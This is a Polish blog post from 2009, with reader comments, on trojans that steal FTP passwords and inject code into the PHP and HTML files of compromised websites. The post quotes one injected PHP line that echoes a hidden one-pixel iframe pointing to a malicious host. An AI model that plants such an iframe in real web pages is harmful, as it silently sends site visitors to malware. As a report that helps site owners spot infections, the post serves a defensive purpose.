Naprawdę jestem pod wrażeniem tej wspaniałej metody. Z coraz większej ilości źródeł i userów docierają do mnie sygnały o podmianach ich stron WWW czy to firmowych czy domowych. Zaobserwowałem, iż część trojanów nie wysyła hasła do centrali, a od razu po przejęciu przez złośliwe oprogramowanie, z zarażonego komputera podmienia strony. Zauważyłem także, że coraz częściej to użytkownicy odwiedzający strony WWW informują ich właścicieli (antywirusy działają :) o problemie na stronie. Ponadto coraz częściej doklejany jest kod nie tylko do plików .htm i .html, ale także plików .php. Trojan szuka ostatniego wystąpienia znaków „?>” i przed nim dokleja kod PHP (chyba dla bezpieczeństwa bo mógłby za nim wklejać kod HTML). Ostatnio znalezione:
echo „< iframe src=\”http://nyoflak_com/?click=2A799F7\”; width=1 height=1 style=\” visibility:hidden;position:absolute\”> </iframe>”;
Jak się jednak okazuje, czasami złoczyńcy popełniają błąd ;] Ostatnio okryłem zainfekowany plik obrazka .GIF. Cały bajer polegał na tym, że plik posiadał w nazwie index.htm czyli index.htm_nav_online-help000_bnr.gif. Jak widać każdy programista się może pomylić ;]
Z ciekawostek warto zauważyć, że trojany nie tylko wybierają hasła z zapisanych plików konfiguracyjnych różnorodnych programów, ale także podsłuchują sieć i w ten sposób przechwytują hasła. Jeden ze znajomych testowo po zmianie hasła korzystał z klienta FTP, który nie przechowywał haseł, a już po 2 dniach jego konto było ponownie zainfekowane. Widać więc, że technik jest wiele i trzeba uważać ze stron wszystkich.
4 komentarze do
2 maja, 2009 o godzinie 14:32
A co to znaczy „na prawde”? „cz y a by na a pewno wi esz c o pi szesz?”
Analfabetyzm w Polsce wzrasta. I nie jest to wtorny, lecz pierwotny analfabetyzm, bo nie uczyliscie sie w waszych gimnazjach. Ponadto razi brak przecinkow, czy jakiejkolwiek interpunkcji. Nie wystarczy uzywanie polskich ogonkow, oj nie …
Jesli taki z ciebie h4x0r, to przynajmniej uzywaj slownikow w przegladarkach. Ach, no i nie zabieraj sie za pisanie jakichkolwiek artykulow, bo do tego trzeba znac swoj ojczysty jezyk w stopniu wyzszym niz „komunikatywny”. Zawartosc merytoryczna serwisu tez pozostawia wiele do zyczenia, poniewaz z twoich postow bije twoje „ja” i twoje emo, zamiast rzeczowych, neutralnych informacji. Zycze powodzenia w udoskonalaniu serwisu. Ach, no i mozesz naturalnie nie publikowac tego posta i pozostawic go do swojej wiadomosci, co pewnie zrobisz, jednak na twoim miejscu bym go pozostawil, aby nie narazac sie na oskarzenia o cenzure i brak autokrytycyzmu [np „a on ma same pozytywne komentarze, cos mi tu smierdzi].
Pozdrawiam
2 maja, 2009 o godzinie 15:14
Jamesie McCarthy, poznaj najpierw Borysa – posłuchaj i porozmawiaj a dowiesz się czegoś. Ujrzysz to wszystko co jest za czubkiem twojego nosa, poza którego koniuszek nie widzisz nic więcej.
4 maja, 2009 o godzinie 17:12
To nie serwis. To blog, dlatego bardzo ciesze się, że bije z nich moje emo i moje ja, bo to oznacza, że blogowanie działa :] Pisałem o tym parę razy na łamach tego właśnie bloga, nie serwisu :]
Lubie i szanuję sensowną krytykę i o tym wiedzą regularni czytelnicy tego bloga i na pewno się tej krytyki nie boję. Wszystkie komentarze automatycznie są akceptowane, poza tymi, które system uzna za spam.
Co do wartości merytorycznej (bloga nie serwisu) mogę jedynie napisać, że obserwując systematyczny wzrost liczby czytelników, coraz większe zainteresowanie samym blogiem, pozytywne oceny docierające do nas w różnorakiej postaci – nie zgodzę się z Tobą zupełnie. Jeśli poziom merytoryczny jest dla Ciebie za niski – rozumiem – jak pisałem ostatnio w jednym z komentarzy – ten blog nie jest dla wszystkich. Namawiam oczywiście także do współtworzenia z nami bothuntersów i podniesienia merytorycznego poziomu całości :]
Za „na prawdę” dziękuje serdecznie – poprawiłem kilkanaście innych wpisów, w których ten błąd systematycznie się pojawia z winy mojej i zapewne pojawi się jeszcze nie raz (choć oczywiście będę się starał aby było go ilościowo coraz mniej :)
31 stycznia, 2012 o godzinie 19:52
Thank you for the auspicious writeup. It in fact was once a amusement account it. Look complicated to more brought agreeable from you! By the way, how could we keep in touch?